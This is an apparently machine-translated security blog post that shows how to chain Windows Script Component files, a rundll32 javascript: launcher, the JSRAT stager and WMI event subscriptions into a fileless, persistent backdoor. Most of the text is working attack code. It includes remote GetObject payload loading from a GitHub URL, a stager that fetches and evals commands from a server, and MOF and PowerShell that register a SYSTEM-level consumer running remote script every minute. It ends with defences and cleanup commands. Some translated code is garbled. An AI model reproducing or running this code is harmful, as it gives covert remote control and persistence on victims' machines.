Merit student · 2016/05/06 14:16
0 x00 preface
Recently, I studied LCX’s material “Using WSC to make an ASP Backdoor”. After learning some features of WSC files, I had an interesting idea:
How powerful would it be if combined with JSRAT and WMI Backdoor?
Related information:
Using WSC to make an ASP backdoor :huaidan.org/archives/25… The WMI Backdoor: drops.wooyun.org/tips/8260 “JavaScript Backdoor: drops.wooyun.org/tips/11764
0x01 WSC
WSC, which stands for Windows Script, can be used to develop COM components that can be called by other languages
For more information: www.xav.com/perl/Window…
1. Simple examples
A simple WSC script is as follows, saved as test.wsc:
#! xml <? The XML version = "1.0"? > <package> <component id="testWSC"> <public> <method name="Sum"> <PARAMETER name="X"/> <PARAMETER name="Y"/> </method> </public> <script language="JScript"> <! [CDATA[ function Sum(X, Y) { var result = X + Y; return result; } ]]> </script> </component> </package>Copy the codeThe Sum function in the script can be called with the following js code:
#! javascript var ref = GetObject("script:C:\\testwsc\\test.wsc"); Var x = ref. Sum (4, 6); WScript.Echo(x);Copy the codeAs shown in figure
Note: WSC file name extensions can be arbitrary
2. Start the calculator locally
This is very familiar to the SCT file, so we can change it to start a calculator
WSC files are as follows:
#! xml <? The XML version = "1.0"? > <package> <component id="testCalc"> <script language="JScript"> <! [CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </component> </package>Copy the codeThe corresponding JS file can be simplified as:
#! javascript GetObject("script:C:\\testwsc\\test.wsc");Copy the codeAfter execution, see the following figure:
3. Start the calculator remotely
What if YOU put WSC files on the server? — Of course it works.
The address is as follows: raw.githubusercontent.com/3gstudent/J…
Change the js file to:
#! javascript GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")Copy the codeExecute as shown in figure:
0x02 JSRAT
What if you use a method that executes JS in rundll32?
1, calc
CMD to execute:
#! shell rundll32.exe javascript:"\.. \mshtml,RunHTMLApplication "; document.write(); GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")Copy the codeAs shown in figure
2, jsrat
What if the contents of the files on the server were replaced with the jSRAT startup code? The code is as follows:
#! xml <? The XML version = "1.0"? > <package> <component id="testCalc"> <script language="JScript"> <! [CDATA[ rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(); H = new % 20 activexobject (\ ". WinHttp WinHttpRequest. 5.1 \ "); w = new % 20 activexobject (\ "WScript. Shell \"); try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\"); = q = v. plit (\ "\") [1]. The split (\ "and \") [0]; h.S etProxy (2, q);} the catch (e) {} h.O pen (\ "GET \", \ "http://127.0.0.1/connect\", false); try{h.Send();B=h.ResponseText;eval(B); }catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}"; new ActiveXObject("WScript.Shell").Run(rat,0,true); ]]> </script> </component> </package>Copy the codeAs the difference between demo, uploaded to another file testJSRAT: raw.githubusercontent.com/3gstudent/J…
CMD to execute:
#! shell rundll32.exe javascript:"\.. \mshtml,RunHTMLApplication "; document.write(); GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/testJSRAT")Copy the codeAfter execution, the shell bounces back to JSRAT
3, analysis,
This approach has the following advantages: a. Once again simplifies the JSRAT startup code by simply executing GetObject() b. Since WSC files are executed remotely, payload can change at any time, and the code can be updated at any time
0x03 WMI Backdoor
WMI allows not only program execution, but also script execution. The method of program execution is described previously and skipped here. The method of script execution is described below
The WMI supports VBS and JS scripts. This section describes how to start the JS script
1, the mof
Note that the escape character “with \” means the following:
pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 1";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consP1";
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Copy the codeDemonstrate a
2, powershell
Note that the escape character “uses “” to indicate the following:
#! powershell $filterName = 'filtP1' $consumerName = 'consP1' $Command ="GetObject(""script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"")" $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ScriptingEngine='JScript'; ScriptText=$Command} Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}Copy the codeDemonstrate a
3, test
#! powershell Get-WMIObject -Namespace root\Subscription -Class __EventFilter Get-WMIObject -Namespace root\Subscription -Class __EventConsumer Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBindingCopy the code4,
#! powershell Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='filtP1'" | Remove-WmiObject -Verbose Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='consP1'" | Remove-WmiObject -Verbose Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -VerboseCopy the code5, analysis,
A. Execute the JS script on the remote server every minute after registration. B. Have the system permission. C. Do not write files e. Do not write registry f. Start automatically
0 x04 defense
1. The first line of defense
Ensure that the system is not invaded. The premise of embedding this backdoor method is to be able to execute the code on the system, so it is recommended to patch, install anti-virus software, and firewall frequently
2, the second line of defense
Establish a whitelist mechanism. Start Windows AppLocker to restrict the running of programs and scripts that are not in the whitelist
The third line of defense
Use EMET (Enhanced Disaster Reduction Experience Tool). Configuration rules to intercept and record the use of regsVR32 and RUNdll32 reference link: github.com/iadgov/Secu…
Configure EMET to intercept regsVR32.
1. Download and install EMET 5.5
www.microsoft.com/en-us/downl…
2. Configure the EMET group policy template
(a) in %ProgramFiles%\EMET 5.5\Deployment\Group Policy Files or %ProgramFiles(x86)%\EMET 5.5\Deployment\Group Policy Files\ (64-bit system) find: emet.admx emet.adml
As shown in figure
Copy emet.admx to %SystemRoot% PolicyDefinitions\
Copy emet.adml to %SystemRoot% PolicyDefinitions en-us\
3. Configure EMET rules
(a) Enter gpedit. MSC to enter the group policy. In The Chinese system, run computer Configuration – Management Template -Windows Component -EMET
The English system is Computer Policy > Administrative Templates > Windows Components > EMET
(b) Double-click Application Configuration and select Enable Click Display
As shown in figure
(c) Settings
Exe value: +ASR ASr_modules :scrobj.dll; scrrun.dll
As shown in figure
(d) Update the group policy template
Enter CMD for management rights:
#! shell gpupdate /forceCopy the codeAs shown in figure
(e) test
The scrobj.dll call from regsVR32 is intercepted
0 x05 summary
In this paper, WSC, JSRAT and WMI Backdoor are combined to achieve a nearly “perfect” Backdoor at the script level.
Of course, the purpose of this article is to help people prepare as much as possible before the technology is abused.